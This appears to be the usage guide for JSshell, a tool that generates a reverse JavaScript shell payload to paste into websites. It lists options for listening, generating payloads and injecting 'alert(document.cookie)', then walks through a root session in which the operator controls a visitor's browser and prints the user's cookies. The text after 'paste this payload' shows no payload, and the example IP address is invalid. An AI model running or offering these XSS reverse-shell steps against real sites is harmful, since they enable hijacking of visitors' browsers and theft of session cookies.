Requirements: Any OS + Python 2 or Python 3
Updated in the new version of JSshell 3.1:
>>> snippet
Use CTRL+D to finish the snippet
jsh.py -p 1234
jsh.py -s 48.586.1.23 -g
jsh.py -c "alert(document.cookie)" -w 10
This is a step-by-step example of how to use JSshell.
First, we need to generate a reverse JS shell payload and set the shell timeout (e.g. 20 seconds):
~# whoami
root
~# ls
README.md jsh.py
~# python3 jsh.py -g -w 20
__ |(_ _ |_ _ | | \_|__)_> | |(/_ | | v1.0
Listening on [any] 4848 for incoming JS shell ...
Now paste this payload to the website:
Access the page and we will have the reverse JS shell:
__ |(_ _ |_ _ | | \_|__)_> | |(/_ | | v1.0
Let's execute some commands:
$ var test = 'controlled'
$ confirm(test)
$
And an alert will pop up:
$ prompt(document.cookie)
$
And the browser will print the user cookies:
$ exit
~# whoami
root
~# pwd
/home/shelld3v
~#
This is created by shelld3v!